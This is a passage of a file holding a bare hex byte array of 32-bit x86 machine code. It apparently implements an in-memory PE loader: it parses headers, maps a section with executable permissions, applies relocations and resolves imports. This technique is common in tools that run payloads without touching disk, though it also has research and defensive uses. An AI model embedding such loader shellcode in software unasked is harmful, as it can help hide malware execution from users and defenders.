741 0x76, 0xfd, 0xff, 0xff, 0x89, 0x44, 0x24, 0x08, 0x89, 0x54, 0x24, 0x04,
742 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0x84, 0xe7, 0xff, 0xff, 0x8b,
743 0x45, 0x08, 0x8b, 0x80, 0x80, 0x00, 0x00, 0x00, 0x8d, 0x95, 0x70, 0xfd,
744 0xff, 0xff, 0x89, 0x54, 0x24, 0x04, 0x8d, 0x95, 0x76, 0xfd, 0xff, 0xff,
745 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x08, 0x89, 0x45, 0xe4, 0x8b,
746 0x45, 0x08, 0x8b, 0x80, 0x88, 0x00, 0x00, 0x00, 0x8b, 0x95, 0x70, 0xfd,
747 0xff, 0xff, 0x89, 0x54, 0x24, 0x08, 0xc7, 0x44, 0x24, 0x04, 0x00, 0x00,
748 0x00, 0x00, 0xc7, 0x04, 0x24, 0x0c, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x83,
749 0xec, 0x0c, 0x89, 0x45, 0xf4, 0x83, 0x7d, 0xf4, 0x00, 0x0f, 0x84, 0x94,
750 0x00, 0x00, 0x00, 0xc7, 0x45, 0x84, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x7a,
751 0x8b, 0x45, 0x08, 0x8b, 0x80, 0x9c, 0x00, 0x00, 0x00, 0x8b, 0x55, 0x84,
752 0x8d, 0x0c, 0x95, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xe4, 0x01, 0xca,
753 0x8b, 0x12, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x04, 0x89, 0x45,
754 0xd0, 0x66, 0xc7, 0x45, 0xc8, 0x08, 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x80,
755 0x8c, 0x00, 0x00, 0x00, 0x8d, 0x55, 0xc8, 0x89, 0x54, 0x24, 0x08, 0x8d,
756 0x55, 0x84, 0x89, 0x54, 0x24, 0x04, 0x8b, 0x55, 0xf4, 0x89, 0x14, 0x24,
757 0xff, 0xd0, 0x83, 0xec, 0x0c, 0x89, 0x45, 0xf0, 0x83, 0x7d, 0xf0, 0x00,
758 0x79, 0x1b, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0x90, 0x00, 0x00, 0x00, 0x8b,
759 0x55, 0xf4, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x04, 0xc7, 0x45,
760 0xf4, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x84, 0x83, 0xc0, 0x01, 0x89,
761 0x45, 0x84, 0x8b, 0x45, 0x84, 0x8b, 0x95, 0x70, 0xfd, 0xff, 0xff, 0x39,
762 0xd0, 0x0f, 0x82, 0x75, 0xff, 0xff, 0xff, 0x83, 0x7d, 0xf0, 0x00, 0x78,
763 0x7a, 0x8b, 0x45, 0x10, 0x8b, 0x40, 0x18, 0x8b, 0x00, 0x8b, 0x80, 0xe4,
764 0x00, 0x00, 0x00, 0x8b, 0x55, 0x10, 0x8b, 0x52, 0x18, 0x8d, 0x4d, 0xb8,
765 0x89, 0x4c, 0x24, 0x24, 0x8b, 0x4d, 0xf4, 0x89, 0x4c, 0x24, 0x20, 0x8b,
766 0x4d, 0x98, 0x89, 0x4c, 0x24, 0x10, 0x8b, 0x4d, 0x9c, 0x89, 0x4c, 0x24,
767 0x14, 0x8b, 0x4d, 0xa0, 0x89, 0x4c, 0x24, 0x18, 0x8b, 0x4d, 0xa4, 0x89,
768 0x4c, 0x24, 0x1c, 0xc7, 0x44, 0x24, 0x0c, 0x00, 0x00, 0x00, 0x00, 0xc7,
769 0x44, 0x24, 0x08, 0x18, 0x01, 0x00, 0x00, 0x8b, 0x4d, 0xe8, 0x89, 0x4c,
770 0x24, 0x04, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x28, 0x89, 0x45,
771 0xf0, 0x83, 0x7d, 0xf4, 0x00, 0x74, 0x14, 0x8b, 0x45, 0x08, 0x8b, 0x80,
772 0x90, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xf4, 0x89, 0x14, 0x24, 0xff, 0xd0,
773 0x83, 0xec, 0x04, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0xa0, 0x00, 0x00, 0x00,
774 0x8b, 0x55, 0xe8, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x04, 0x8b,
775 0x45, 0x08, 0x8b, 0x80, 0xa0, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xec, 0x89,
776 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x04, 0xb8, 0x01, 0x00, 0x00, 0x00,
777 0x8b, 0x5d, 0xfc, 0xc9, 0xc3, 0x55, 0x89, 0xe5, 0x83, 0xec, 0x28, 0x8b,
778 0x45, 0x0c, 0x8b, 0x40, 0x18, 0x85, 0xc0, 0x74, 0x26, 0x8b, 0x45, 0x0c,
779 0x8b, 0x40, 0x18, 0x8b, 0x00, 0x8b, 0x40, 0x08, 0x8b, 0x55, 0x0c, 0x8b,
780 0x52, 0x18, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x04, 0x89, 0x45,
781 0xf4, 0x8b, 0x45, 0x0c, 0xc7, 0x40, 0x18, 0x00, 0x00, 0x00, 0x00, 0x8b,
782 0x45, 0x0c, 0x8b, 0x40, 0x1c, 0x85, 0xc0, 0x74, 0x26, 0x8b, 0x45, 0x0c,
783 0x8b, 0x40, 0x1c, 0x8b, 0x00, 0x8b, 0x40, 0x08, 0x8b, 0x55, 0x0c, 0x8b,
784 0x52, 0x1c, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x04, 0x89, 0x45,
785 0xf4, 0x8b, 0x45, 0x0c, 0xc7, 0x40, 0x1c, 0x00, 0x00, 0x00, 0x00, 0x8b,
786 0x45, 0x0c, 0x8b, 0x40, 0x14, 0x85, 0xc0, 0x74, 0x26, 0x8b, 0x45, 0x0c,
787 0x8b, 0x40, 0x14, 0x8b, 0x00, 0x8b, 0x40, 0x08, 0x8b, 0x55, 0x0c, 0x8b,
788 0x52, 0x14, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x04, 0x89, 0x45,
789 0xf4, 0x8b, 0x45, 0x0c, 0xc7, 0x40, 0x14, 0x00, 0x00, 0x00, 0x00, 0x8b,
790 0x45, 0x0c, 0x8b, 0x40, 0x08, 0x85, 0xc0, 0x74, 0x68, 0x8b, 0x45, 0x0c,
791 0x8b, 0x40, 0x08, 0x8b, 0x00, 0x8b, 0x40, 0x50, 0x8b, 0x55, 0x0c, 0x8b,
792 0x4a, 0x10, 0x8b, 0x55, 0x0c, 0x8b, 0x52, 0x08, 0x89, 0x4c, 0x24, 0x04,
793 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x08, 0x89, 0x45, 0xf4, 0x8b,
794 0x45, 0x0c, 0x8b, 0x40, 0x08, 0x8b, 0x00, 0x8b, 0x40, 0x2c, 0x8b, 0x55,
795 0x0c, 0x8b, 0x52, 0x08, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x04,
796 0x89, 0x45, 0xf4, 0x8b, 0x45, 0x0c, 0x8b, 0x40, 0x08, 0x8b, 0x00, 0x8b,
797 0x40, 0x08, 0x8b, 0x55, 0x0c, 0x8b, 0x52, 0x08, 0x89, 0x14, 0x24, 0xff,
798 0xd0, 0x83, 0xec, 0x04, 0x89, 0x45, 0xf4, 0x8b, 0x45, 0x0c, 0xc7, 0x40,
799 0x08, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x0c, 0x8b, 0x40, 0x10, 0x85,
800 0xc0, 0x74, 0x26, 0x8b, 0x45, 0x0c, 0x8b, 0x40, 0x10, 0x8b, 0x00, 0x8b,
801 0x40, 0x08, 0x8b, 0x55, 0x0c, 0x8b, 0x52, 0x10, 0x89, 0x14, 0x24, 0xff,
802 0xd0, 0x83, 0xec, 0x04, 0x89, 0x45, 0xf4, 0x8b, 0x45, 0x0c, 0xc7, 0x40,
803 0x10, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x0c, 0x8b, 0x40, 0x0c, 0x85,
804 0xc0, 0x74, 0x26, 0x8b, 0x45, 0x0c, 0x8b, 0x40, 0x0c, 0x8b, 0x00, 0x8b,
805 0x40, 0x08, 0x8b, 0x55, 0x0c, 0x8b, 0x52, 0x0c, 0x89, 0x14, 0x24, 0xff,
806 0xd0, 0x83, 0xec, 0x04, 0x89, 0x45, 0xf4, 0x8b, 0x45, 0x0c, 0xc7, 0x40,
807 0x0c, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x0c, 0x8b, 0x40, 0x04, 0x85,
808 0xc0, 0x74, 0x26, 0x8b, 0x45, 0x0c, 0x8b, 0x40, 0x04, 0x8b, 0x00, 0x8b,
809 0x40, 0x08, 0x8b, 0x55, 0x0c, 0x8b, 0x52, 0x04, 0x89, 0x14, 0x24, 0xff,
810 0xd0, 0x83, 0xec, 0x04, 0x89, 0x45, 0xf4, 0x8b, 0x45, 0x0c, 0xc7, 0x40,
811 0x04, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x85, 0xc0,
812 0x74, 0x23, 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x8b, 0x00, 0x8b, 0x40, 0x08,
813 0x8b, 0x55, 0x0c, 0x8b, 0x12, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec,
814 0x04, 0x89, 0x45, 0xf4, 0x8b, 0x45, 0x0c, 0xc7, 0x00, 0x00, 0x00, 0x00,
815 0x00, 0x90, 0xc9, 0xc3, 0x55, 0x89, 0xe5, 0x57, 0x56, 0x53, 0x81, 0xec,
816 0x4c, 0x04, 0x00, 0x00, 0xc7, 0x85, 0x3c, 0xff, 0xff, 0xff, 0x00, 0x00,
817 0x00, 0x00, 0xc7, 0x45, 0xc8, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xb8,
818 0x00, 0x00, 0x00, 0x00, 0xc7, 0x85, 0x1c, 0xfc, 0xff, 0xff, 0x00, 0x00,
819 0x00, 0x00, 0xc7, 0x85, 0x18, 0xfc, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00,
820 0x8b, 0x45, 0x08, 0x8b, 0x90, 0xfc, 0x01, 0x00, 0x00, 0x8b, 0x80, 0xf8,
821 0x01, 0x00, 0x00, 0x89, 0x45, 0xb4, 0x8b, 0x45, 0x0c, 0x05, 0x28, 0x05,
822 0x00, 0x00, 0x89, 0x45, 0xb0, 0x8b, 0x45, 0xb0, 0x89, 0x45, 0xac, 0x8b,
823 0x45, 0xac, 0x8b, 0x40, 0x3c, 0x89, 0xc2, 0x8b, 0x45, 0xb0, 0x01, 0xd0,
824 0x89, 0x45, 0xa8, 0x8b, 0x45, 0x08, 0x8b, 0x40, 0x38, 0xc7, 0x04, 0x24,
825 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x83, 0xec, 0x04, 0x89, 0x45, 0xa4,
826 0x8b, 0x45, 0xa4, 0x89, 0x45, 0xa0, 0x8b, 0x45, 0xa0, 0x8b, 0x40, 0x3c,
827 0x89, 0xc2, 0x8b, 0x45, 0xa4, 0x01, 0xd0, 0x89, 0x45, 0x9c, 0x8b, 0x45,
828 0xa8, 0x0f, 0xb7, 0x50, 0x04, 0x8b, 0x45, 0x9c, 0x0f, 0xb7, 0x40, 0x04,
829 0x66, 0x39, 0xc2, 0x0f, 0x85, 0x2a, 0x11, 0x00, 0x00, 0x8b, 0x45, 0xa8,
830 0x8b, 0x40, 0x50, 0xba, 0x00, 0x00, 0x00, 0x00, 0x89, 0x85, 0x20, 0xfc,
831 0xff, 0xff, 0x89, 0x95, 0x24, 0xfc, 0xff, 0xff, 0x8b, 0x45, 0xa8, 0x8b,
832 0x80, 0xa4, 0x00, 0x00, 0x00, 0x89, 0x45, 0x98, 0x83, 0x7d, 0x98, 0x00,
833 0x0f, 0x95, 0xc0, 0x0f, 0xb6, 0xc0, 0x89, 0x45, 0x94, 0x83, 0x7d, 0x94,
834 0x00, 0x75, 0x0c, 0x8b, 0x45, 0xa8, 0x8b, 0x40, 0x34, 0x89, 0x85, 0x1c,
835 0xfc, 0xff, 0xff, 0x8b, 0x45, 0x08, 0x0f, 0xb6, 0x80, 0xfb, 0x05, 0x00,
836 0x00, 0x84, 0xc0, 0x75, 0x59, 0x8b, 0x45, 0xb4, 0x89, 0x44, 0x24, 0x1c,
837 0xc7, 0x44, 0x24, 0x18, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x14,
838 0x00, 0x00, 0x00, 0x08, 0xc7, 0x44, 0x24, 0x10, 0x40, 0x00, 0x00, 0x00,
839 0x8d, 0x85, 0x20, 0xfc, 0xff, 0xff, 0x89, 0x44, 0x24, 0x0c, 0xc7, 0x44,
840 0x24, 0x08, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x04, 0x1f, 0x00,
841 0x0f, 0x00, 0x8d, 0x85, 0x2c, 0xfc, 0xff, 0xff, 0x89, 0x04, 0x24, 0xe8,
842 0x7d, 0x32, 0x00, 0x00, 0x89, 0x45, 0x90, 0x83, 0x7d, 0x90, 0x00, 0x0f,
843 0x89, 0x63, 0x01, 0x00, 0x00, 0xe9, 0xac, 0x10, 0x00, 0x00, 0x8b, 0x45,
844 0x08, 0x8b, 0x80, 0xf0, 0x00, 0x00, 0x00, 0x8b, 0x55, 0x08, 0x81, 0xc2,
845 0xfb, 0x05, 0x00, 0x00, 0x89, 0x54, 0x24, 0x04, 0x8d, 0x95, 0xdc, 0xfb,
846 0xff, 0xff, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x08, 0xc7, 0x85,
847 0xec, 0xfb, 0xff, 0xff, 0x18, 0x00, 0x00, 0x00, 0xc7, 0x85, 0xf0, 0xfb,
848 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x85, 0xf8, 0xfb, 0xff, 0xff,
849 0x40, 0x00, 0x00, 0x00, 0x8d, 0x85, 0xdc, 0xfb, 0xff, 0xff, 0x89, 0x85,
850 0xf4, 0xfb, 0xff, 0xff, 0xc7, 0x85, 0xfc, 0xfb, 0xff, 0xff, 0x00, 0x00,
851 0x00, 0x00, 0xc7, 0x85, 0x00, 0xfc, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00,
852 0x8b, 0x45, 0xb4, 0x89, 0x44, 0x24, 0x2c, 0xc7, 0x44, 0x24, 0x28, 0x00,
853 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x24, 0x00, 0x00, 0x00, 0x00, 0xc7,
854 0x44, 0x24, 0x20, 0x40, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x1c, 0x01,
855 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x18, 0x01, 0x00, 0x00, 0x00, 0xc7,
856 0x44, 0x24, 0x14, 0x80, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x10, 0x00,
857 0x00, 0x00, 0x00, 0x8d, 0x85, 0xe4, 0xfb, 0xff, 0xff, 0x89, 0x44, 0x24,
858 0x0c, 0x8d, 0x85, 0xec, 0xfb, 0xff, 0xff, 0x89, 0x44, 0x24, 0x08, 0xc7,
859 0x44, 0x24, 0x04, 0x00, 0x00, 0x00, 0x80, 0x8d, 0x85, 0x04, 0xfc, 0xff,
860 0xff, 0x89, 0x04, 0x24, 0xe8, 0xb1, 0x32, 0x00, 0x00, 0x89, 0x45, 0x90,
861 0x83, 0x7d, 0x90, 0x00, 0x0f, 0x88, 0xac, 0x0f, 0x00, 0x00, 0x8b, 0x85,
862 0x04, 0xfc, 0xff, 0xff, 0x83, 0xf8, 0xff, 0x0f, 0x84, 0x9d, 0x0f, 0x00,
863 0x00, 0x8b, 0x85, 0x04, 0xfc, 0xff, 0xff, 0x85, 0xc0, 0x0f, 0x84, 0x8f,
864 0x0f, 0x00, 0x00, 0x8b, 0x85, 0x04, 0xfc, 0xff, 0xff, 0x8b, 0x55, 0xb4,
865 0x89, 0x54, 0x24, 0x1c, 0x89, 0x44, 0x24, 0x18, 0xc7, 0x44, 0x24, 0x14,
866 0x00, 0x00, 0x00, 0x01, 0xc7, 0x44, 0x24, 0x10, 0x02, 0x00, 0x00, 0x00,
867 0xc7, 0x44, 0x24, 0x0c, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x08,
868 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x04, 0x1f, 0x00, 0x0f, 0x00,
869 0x8d, 0x85, 0x2c, 0xfc, 0xff, 0xff, 0x89, 0x04, 0x24, 0xe8, 0x2f, 0x31,
870 0x00, 0x00, 0x89, 0x45, 0x90, 0x8b, 0x85, 0x04, 0xfc, 0xff, 0xff, 0x8b,
871 0x55, 0xb4, 0x89, 0x54, 0x24, 0x04, 0x89, 0x04, 0x24, 0xe8, 0x86, 0x31,
872 0x00, 0x00, 0x83, 0x7d, 0x90, 0x00, 0x0f, 0x88, 0x29, 0x0f, 0x00, 0x00,
873 0x8b, 0x85, 0x2c, 0xfc, 0xff, 0xff, 0x8b, 0x55, 0xb4, 0x89, 0x54, 0x24,
874 0x28, 0xc7, 0x44, 0x24, 0x24, 0x04, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24,
875 0x20, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x1c, 0x02, 0x00, 0x00,
876 0x00, 0x8d, 0x95, 0x18, 0xfc, 0xff, 0xff, 0x89, 0x54, 0x24, 0x18, 0xc7,
877 0x44, 0x24, 0x14, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x10, 0x00,
878 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x0c, 0x00, 0x00, 0x00, 0x00, 0x8d,
879 0x95, 0x1c, 0xfc, 0xff, 0xff, 0x89, 0x54, 0x24, 0x08, 0xc7, 0x44, 0x24,
880 0x04, 0xff, 0xff, 0xff, 0xff, 0x89, 0x04, 0x24, 0xe8, 0xc7, 0x30, 0x00,
881 0x00, 0x89, 0x45, 0x90, 0x83, 0x7d, 0x90, 0x00, 0x0f, 0x88, 0xbe, 0x0e,
882 0x00, 0x00, 0x8b, 0x85, 0x1c, 0xfc, 0xff, 0xff, 0x85, 0xc0, 0x0f, 0x84,
883 0xb3, 0x0e, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x0f, 0xb6, 0x80, 0xfb, 0x05,
884 0x00, 0x00, 0x84, 0xc0, 0x74, 0x5e, 0x8b, 0x85, 0x1c, 0xfc, 0xff, 0xff,
885 0x89, 0x85, 0x14, 0xfc, 0xff, 0xff, 0x8b, 0x85, 0x18, 0xfc, 0xff, 0xff,
886 0x89, 0x85, 0x10, 0xfc, 0xff, 0xff, 0x8b, 0x45, 0xb4, 0x89, 0x44, 0x24,
887 0x14, 0x8d, 0x85, 0x30, 0xfc, 0xff, 0xff, 0x89, 0x44, 0x24, 0x10, 0xc7,
888 0x44, 0x24, 0x0c, 0x04, 0x00, 0x00, 0x00, 0x8d, 0x85, 0x10, 0xfc, 0xff,
889 0xff, 0x89, 0x44, 0x24, 0x08, 0x8d, 0x85, 0x14, 0xfc, 0xff, 0xff, 0x89,
890 0x44, 0x24, 0x04, 0xc7, 0x04, 0x24, 0xff, 0xff, 0xff, 0xff, 0xe8, 0xd7,
891 0x30, 0x00, 0x00, 0x89, 0x45, 0x90, 0x83, 0x7d, 0x90, 0x00, 0x0f, 0x88,
892 0x4a, 0x0e, 0x00, 0x00, 0x8b, 0x45, 0xa8, 0x8b, 0x50, 0x54, 0x8b, 0x85,
893 0x1c, 0xfc, 0xff, 0xff, 0x89, 0x54, 0x24, 0x08, 0x8b, 0x55, 0xb0, 0x89,
894 0x54, 0x24, 0x04, 0x89, 0x04, 0x24, 0xe8, 0xa3, 0x2a, 0x00, 0x00, 0x8b,
895 0x45, 0xa8, 0x0f, 0xb7, 0x40, 0x14, 0x0f, 0xb7, 0xd0, 0x8b, 0x45, 0xa8,
896 0x01, 0xd0, 0x83, 0xc0, 0x18, 0x89, 0x45, 0x8c, 0xc7, 0x45, 0xc4, 0x00,
897 0x00, 0x00, 0x00, 0xeb, 0x67, 0x8b, 0x55, 0xc4, 0x89, 0xd0, 0xc1, 0xe0,
898 0x02, 0x01, 0xd0, 0xc1, 0xe0, 0x03, 0x89, 0xc2, 0x8b, 0x45, 0x8c, 0x01,
899 0xd0, 0x8b, 0x50, 0x10, 0x8b, 0x4d, 0xc4, 0x89, 0xc8, 0xc1, 0xe0, 0x02,
900 0x01, 0xc8, 0xc1, 0xe0, 0x03, 0x89, 0xc1, 0x8b, 0x45, 0x8c, 0x01, 0xc8,
901 0x8b, 0x48, 0x14, 0x8b, 0x45, 0xb0, 0x8d, 0x1c, 0x01, 0x8b, 0xb5, 0x1c,
902 0xfc, 0xff, 0xff, 0x8b, 0x4d, 0xc4, 0x89, 0xc8, 0xc1, 0xe0, 0x02, 0x01,
903 0xc8, 0xc1, 0xe0, 0x03, 0x89, 0xc1, 0x8b, 0x45, 0x8c, 0x01, 0xc8, 0x8b,
904 0x40, 0x0c, 0x01, 0xf0, 0x89, 0x54, 0x24, 0x08, 0x89, 0x5c, 0x24, 0x04,
905 0x89, 0x04, 0x24, 0xe8, 0x22, 0x2a, 0x00, 0x00, 0x83, 0x45, 0xc4, 0x01,
906 0x8b, 0x45, 0xa8, 0x0f, 0xb7, 0x40, 0x06, 0x0f, 0xb7, 0xc0, 0x39, 0x45,
907 0xc4, 0x72, 0x8a, 0x8b, 0x95, 0x1c, 0xfc, 0xff, 0xff, 0x8b, 0x45, 0xa8,
908 0x8b, 0x40, 0x34, 0xf7, 0xd8, 0x01, 0xd0, 0x89, 0x45, 0x88, 0x83, 0x7d,
909 0x94, 0x00, 0x0f, 0x84, 0x52, 0x01, 0x00, 0x00, 0x83, 0x7d, 0x88, 0x00,
910 0x0f, 0x84, 0x48, 0x01, 0x00, 0x00, 0x8b, 0x45, 0xa8, 0x8b, 0x80, 0xa0,
911 0x00, 0x00, 0x00, 0x89, 0x45, 0x84, 0x8b, 0x85, 0x1c, 0xfc, 0xff, 0xff,
912 0x89, 0xc2, 0x8b, 0x45, 0x84, 0x01, 0xd0, 0x89, 0x45, 0xcc, 0xe9, 0x04,
913 0x01, 0x00, 0x00, 0x8b, 0x45, 0xcc, 0x83, 0xc0, 0x08, 0x89, 0x45, 0xd0,
914 0xe9, 0xdc, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xcc, 0x8b, 0x10, 0x8b, 0x45,
915 0xd0, 0x0f, 0xb7, 0x00, 0x66, 0x25, 0xff, 0x0f, 0x0f, 0xb7, 0xc0, 0x01,
916 0xc2, 0x8b, 0x45, 0xa8, 0x8b, 0x40, 0x50, 0x39, 0xc2, 0x0f, 0x83, 0xb6,
917 0x00, 0x00, 0x00, 0x8b, 0x95, 0x1c, 0xfc, 0xff, 0xff, 0x8b, 0x45, 0xcc,
918 0x8b, 0x08, 0x8b, 0x45, 0xd0, 0x0f, 0xb7, 0x00, 0x66, 0x25, 0xff, 0x0f,
919 0x0f, 0xb7, 0xc0, 0x01, 0xc8, 0x01, 0xd0, 0x89, 0x45, 0x80, 0x8b, 0x45,
920 0xd0, 0x0f, 0xb6, 0x40, 0x01, 0x83, 0xe0, 0xf0, 0x3c, 0xa0, 0x75, 0x11,
921 0x8b, 0x45, 0x80, 0x8b, 0x10, 0x8b, 0x45, 0x88, 0x01, 0xc2, 0x8b, 0x45,
922 0x80, 0x89, 0x10, 0xeb, 0x78, 0x8b, 0x45, 0xd0, 0x0f, 0xb6, 0x40, 0x01,
923 0x83, 0xe0, 0xf0, 0x3c, 0x30, 0x75, 0x11, 0x8b, 0x45, 0x80, 0x8b, 0x10,
924 0x8b, 0x45, 0x88, 0x01, 0xc2, 0x8b, 0x45, 0x80, 0x89, 0x10, 0xeb, 0x59,
925 0x8b, 0x45, 0xd0, 0x0f, 0xb6, 0x40, 0x01, 0x83, 0xe0, 0xf0, 0x3c, 0x10,
926 0x75, 0x17, 0x8b, 0x45, 0x80, 0x8b, 0x10, 0x8b, 0x45, 0x88, 0xc1, 0xe8,
927 0x10, 0x0f, 0xb7, 0xc0, 0x01, 0xc2, 0x8b, 0x45, 0x80, 0x89, 0x10, 0xeb,
928 0x34, 0x8b, 0x45, 0xd0, 0x0f, 0xb6, 0x40, 0x01, 0x83, 0xe0, 0xf0, 0x3c,
929 0x20, 0x75, 0x14, 0x8b, 0x45, 0x80, 0x8b, 0x10, 0x8b, 0x45, 0x88, 0x0f,
930 0xb7, 0xc0, 0x01, 0xc2, 0x8b, 0x45, 0x80, 0x89, 0x10, 0xeb, 0x12, 0x8b,
931 0x45, 0xd0, 0x0f, 0xb6, 0x40, 0x01, 0x83, 0xe0, 0xf0, 0x84, 0xc0, 0x0f,
932 0x85, 0xc9, 0x0b, 0x00, 0x00, 0x83, 0x45, 0xd0, 0x02, 0x8b, 0x45, 0xcc,
933 0x8b, 0x50, 0x04, 0x8b, 0x45, 0xcc, 0x01, 0xd0, 0x39, 0x45, 0xd0, 0x0f,
934 0x85, 0x10, 0xff, 0xff, 0xff, 0x8b, 0x45, 0xd0, 0x89, 0x45, 0xcc, 0x8b,
935 0x85, 0x1c, 0xfc, 0xff, 0xff, 0x8b, 0x4d, 0x84, 0x8b, 0x55, 0x98, 0x01,
936 0xca, 0x01, 0xd0, 0x39, 0x45, 0xcc, 0x73, 0x0e, 0x8b, 0x45, 0xcc, 0x8b,
937 0x40, 0x04, 0x85, 0xc0, 0x0f, 0x85, 0xd9, 0xfe, 0xff, 0xff, 0x8b, 0x45,
938 0xa8, 0x8b, 0x80, 0x80, 0x00, 0x00, 0x00, 0x89, 0x45, 0x84, 0x83, 0x7d,
939 0x84, 0x00, 0x0f, 0x84, 0x46, 0x01, 0x00, 0x00, 0x8b, 0x85, 0x1c, 0xfc,
940 0xff, 0xff, 0x89, 0xc2, 0x8b, 0x45, 0x84, 0x01, 0xd0, 0x89, 0x45, 0xdc,
941 0xe9, 0x23, 0x01, 0x00, 0x00, 0x8b, 0x45, 0xdc, 0x8b, 0x50, 0x0c, 0x8b,
942 0x85, 0x1c, 0xfc, 0xff, 0xff, 0x01, 0xd0, 0x89, 0x85, 0x7c, 0xff, 0xff,
943 0xff, 0x8b, 0x85, 0x7c, 0xff, 0xff, 0xff, 0x89, 0x44, 0x24, 0x04, 0x8b,
944 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0x7a, 0xe1, 0xff, 0xff, 0x89, 0x85,
945 0x78, 0xff, 0xff, 0xff, 0x8b, 0x45, 0xdc, 0x8b, 0x10, 0x8b, 0x85, 0x1c,
946 0xfc, 0xff, 0xff, 0x01, 0xd0, 0x89, 0x45, 0xe4, 0x8b, 0x45, 0xdc, 0x8b,
947 0x50, 0x10, 0x8b, 0x85, 0x1c, 0xfc, 0xff, 0xff, 0x01, 0xd0, 0x89, 0x45,
948 0xe0, 0x8b, 0x45, 0xe4, 0x8b, 0x00, 0x85, 0xc0, 0x0f, 0x84, 0xc1, 0x00,
949 0x00, 0x00, 0x8b, 0x45, 0xe4, 0x8b, 0x00, 0x85, 0xc0, 0x79, 0x2f, 0x8b,
950 0x45, 0xe4, 0x8b, 0x00, 0x89, 0x44, 0x24, 0x0c, 0xc7, 0x44, 0x24, 0x08,
951 0x00, 0x00, 0x00, 0x00, 0x8b, 0x85, 0x78, 0xff, 0xff, 0xff, 0x89, 0x44,
952 0x24, 0x04, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0xbe, 0xde, 0xff,
953 0xff, 0x89, 0xc2, 0x8b, 0x45, 0xe0, 0x89, 0x10, 0xeb, 0x7c, 0x8b, 0x45,
954 0xe4, 0x8b, 0x10, 0x8b, 0x85, 0x1c, 0xfc, 0xff, 0xff, 0x01, 0xd0, 0x89,
955 0x85, 0x74, 0xff, 0xff, 0xff, 0x8b, 0x45, 0x0c, 0x8b, 0x40, 0x04, 0x85,
956 0xc0, 0x74, 0x2e, 0x8b, 0x85, 0x74, 0xff, 0xff, 0xff, 0x83, 0xc0, 0x02,
957 0x89, 0x44, 0x24, 0x04, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0x57,
958 0x0b, 0x00, 0x00, 0x85, 0xc0, 0x74, 0x12, 0x8b, 0x45, 0x08, 0x8b, 0x80,
959 0xf4, 0x00, 0x00, 0x00, 0x89, 0xc2, 0x8b, 0x45, 0xe0, 0x89, 0x10, 0xeb,
960 0x31, 0x8b, 0x85, 0x74, 0xff, 0xff, 0xff, 0x83, 0xc0, 0x02, 0xc7, 0x44,
961 0x24, 0x0c, 0x00, 0x00, 0x00, 0x00, 0x89, 0x44, 0x24, 0x08, 0x8b, 0x85,
962 0x78, 0xff, 0xff, 0xff, 0x89, 0x44, 0x24, 0x04, 0x8b, 0x45, 0x08, 0x89,
963 0x04, 0x24, 0xe8, 0x40, 0xde, 0xff, 0xff, 0x89, 0xc2, 0x8b, 0x45, 0xe0,
964 0x89, 0x10, 0x83, 0x45, 0xe4, 0x04, 0x83, 0x45, 0xe0, 0x04, 0xe9, 0x32,
965 0xff, 0xff, 0xff, 0x90, 0x83, 0x45, 0xdc, 0x14, 0x8b, 0x45, 0xdc, 0x8b,
966 0x40, 0x0c, 0x85, 0xc0, 0x0f, 0x85, 0xcf, 0xfe, 0xff, 0xff, 0x8b, 0x45,
